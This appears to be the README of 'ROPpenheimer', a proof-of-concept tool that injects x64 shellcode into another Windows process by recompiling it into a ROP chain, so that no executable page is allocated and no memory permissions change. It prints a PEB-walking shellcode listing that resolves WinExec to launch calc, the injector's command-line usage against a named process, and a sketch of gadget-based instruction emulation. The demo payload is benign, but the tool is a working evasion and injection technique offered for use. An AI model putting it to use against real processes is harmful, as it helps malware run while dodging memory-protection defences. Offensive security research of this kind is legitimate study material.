Injecting code into a process without allocating a single executable page by recompiling x64 shellcode into a single ROP chain.
In this example we recompile the shellcode below, which walks the PEB's loaded-module list, finds kernel32.dll!WinExec, and calls it to open the Windows calculator.
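The cmp immediates at offsets 0x51 and 0x59 of the listing, and the value stored at offset 0x72, are ASCII strings packed as little-endian DWORDs. The short Python sketch below decodes them. It is only an illustration and not part of the tool, and the helper name imm32_to_bytes is made up for this example.

```python
import struct

def imm32_to_bytes(value):
    """Return the 4 bytes of a 32-bit immediate as they are laid out in memory."""
    return struct.pack("<I", value)

# The export name the loop compares against (cmp at 0x51 and 0x59).
name = imm32_to_bytes(0x456E6957) + imm32_to_bytes(0x00636578)

# The command line written to the stack (mov at 0x72, terminator at 0x79).
command = imm32_to_bytes(0x636C6163) + b"\x00"

print(name, command)  # b'WinExec\x00' b'calc\x00'
```

Because the second compare includes the trailing NUL byte, the loop only matches an export whose name is exactly "WinExec".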
Shellcode Example
0: fc cld
1: 48 31 d2 xor rdx,rdx
4: 65 48 8b 52 60 mov rdx,QWORD PTR gs:[rdx+0x60]
9: 48 8b 52 18 mov rdx,QWORD PTR [rdx+0x18]
d: 48 8b 52 20 mov rdx,QWORD PTR [rdx+0x20]
11: 48 8b 12 mov rdx,QWORD PTR [rdx]
14: 48 8b 12 mov rdx,QWORD PTR [rdx]
17: 48 8b 5a 20 mov rbx,QWORD PTR [rdx+0x20]
1b: 8b 43 3c mov eax,DWORD PTR [rbx+0x3c]
1e: 48 01 d8 add rax,rbx
21: 8b 80 88 00 00 00 mov eax,DWORD PTR [rax+0x88]
27: 85 c0 test eax,eax
29: 74 61 je 0x8c
2b: 48 01 d8 add rax,rbx
2e: 8b 48 18 mov ecx,DWORD PTR [rax+0x18]
31: 44 8b 40 20 mov r8d,DWORD PTR [rax+0x20]
35: 49 01 d8 add r8,rbx
38: 44 8b 48 24 mov r9d,DWORD PTR [rax+0x24]
3c: 49 01 d9 add r9,rbx
3f: 44 8b 50 1c mov r10d,DWORD PTR [rax+0x1c]
43: 49 01 da add r10,rbx
46: ff c9 dec ecx
48: 78 42 js 0x8c
4a: 41 8b 34 88 mov esi,DWORD PTR [r8+rcx*4]
4e: 48 01 de add rsi,rbx
51: 81 3e 57 69 6e 45 cmp DWORD PTR [rsi],0x456e6957
57: 75 ed jne 0x46
59: 81 7e 04 78 65 63 00 cmp DWORD PTR [rsi+0x4],0x636578
60: 75 e4 jne 0x46
62: 41 0f b7 04 49 movzx eax,WORD PTR [r9+rcx*2]
67: 41 8b 04 82 mov eax,DWORD PTR [r10+rax*4]
6b: 48 01 d8 add rax,rbx
6e: 48 83 ec 28 sub rsp,0x28
72: c7 04 24 63 61 6c 63 mov DWORD PTR [rsp],0x636c6163
79: c6 44 24 04 00 mov BYTE PTR [rsp+0x4],0x0
7e: 48 89 e1 mov rcx,rsp
81: ba 01 00 00 00 mov edx,0x1
86: ff d0 call rax
88: 48 83 c4 28 add rsp,0x28
8c: cc int3
ROPpenheimer Injector
.\rophi [OPTIONS]
OPTIONS:
-h, --help Print this help message and exit
-f, --file TEXT:FILE REQUIRED
Input file.
-p, --process TEXT REQUIRED
Process name.
-d, --dump Dump the LLVM IR to the screen.
--stack-block-size UINT
Size of allocated region for the ROP chain.
--register-block-size UINT
Size of allocated region for the virtual registers.
$ .\rophi -f payload.bin -p test.exe
Well, to understand how it works, we need to understand the motivation:
How can we execute arbitrary code (in usermode) in another process without:
- Allocating a new executable page
- Changing memory permissions (e.g. making pages writable + executable)
The first thing that came to my mind was ROP: reusing code that already exists in the process to execute what we want. That's good enough for us. The big issue is that we only have so many gadgets, so it's not feasible to translate each shellcode instruction 1:1 into a corresponding gadget. Even if we could, we would have to find an equivalent gadget for hundreds or thousands of distinct instructions.
That's exactly where Remill comes into play. It lets us lift normal x64 shellcode into LLVM IR, where we only have to implement ~70 "instructions" at most. So now we only need gadgets for a fraction of the original instruction set, but that is still far too many. To solve this, we gather only about 14 gadgets and use them to build an abstraction layer that emulates the other instructions. If you've played Turing Complete or done nand2tetris, you'll see where I'm going with this.
For example, we don't have a subtraction gadget. Instead, we emit the gadgets necessary to emulate subtraction with addition and a NOT: a - b = a + (~b + 1), and so on and so forth. Generally we build this on top of VRegisters, which are just slots of memory that let us consistently model the state of registers across different gadgets that may alter the actual registers. They also let us read and write any "register", even though the gadget instructions themselves generally only use rax and rcx. So yeah, that's pretty much the gist.
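As a rough illustration of the two ideas above, here is a toy Python model of memory-backed virtual registers and of subtraction built only from add and not. Everything in it is an assumption made for the example: the gadget names (load_rax, store_rax, and so on), the Machine class, and the chain representation are hypothetical and do not reflect the actual gadget set or internals of the tool.

```python
MASK64 = (1 << 64) - 1  # registers are 64 bits wide

class Machine:
    """Toy CPU: two real registers plus memory-backed virtual registers."""
    def __init__(self):
        self.rax = 0
        self.rcx = 0
        self.vregs = {}  # virtual register name -> 64-bit value (a memory slot)

# Hypothetical gadget primitives (assumed for illustration only).
def load_rax(m, slot):  m.rax = m.vregs.get(slot, 0)
def load_rcx(m, slot):  m.rcx = m.vregs.get(slot, 0)
def store_rax(m, slot): m.vregs[slot] = m.rax
def set_rcx(m, imm):    m.rcx = imm & MASK64
def add_rax_rcx(m):     m.rax = (m.rax + m.rcx) & MASK64
def not_rax(m):         m.rax = ~m.rax & MASK64

def emit_sub(dst, a, b):
    """Return a chain computing dst = a - b as a + (~b + 1), with no sub gadget."""
    return [
        (load_rax, b), (not_rax,),        # rax = ~b
        (set_rcx, 1), (add_rax_rcx,),     # rax = ~b + 1
        (load_rcx, a), (add_rax_rcx,),    # rax = a + (~b + 1)
        (store_rax, dst),                 # write the result back to a virtual register
    ]

def run(m, chain):
    """Execute each (gadget, *args) entry in order, like walking a ROP chain."""
    for gadget, *args in chain:
        gadget(m, *args)

m = Machine()
m.vregs["rbx"] = 5
m.vregs["rsi"] = 7
run(m, emit_sub("rdi", "rbx", "rsi"))
print(hex(m.vregs["rdi"]))  # 0xfffffffffffffffe, i.e. -2 in two's complement
```

Note that the chain only ever touches rax and rcx directly. The operands and the result live in virtual register slots, so a gadget that clobbers a real register along the way cannot corrupt the modeled state.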
This is still absolutely a PoC, with innumerable bugs, missing instruction implementations, and more, most of which I’ll either fix later or address in another version. Feel free to report an issue or open a PR.
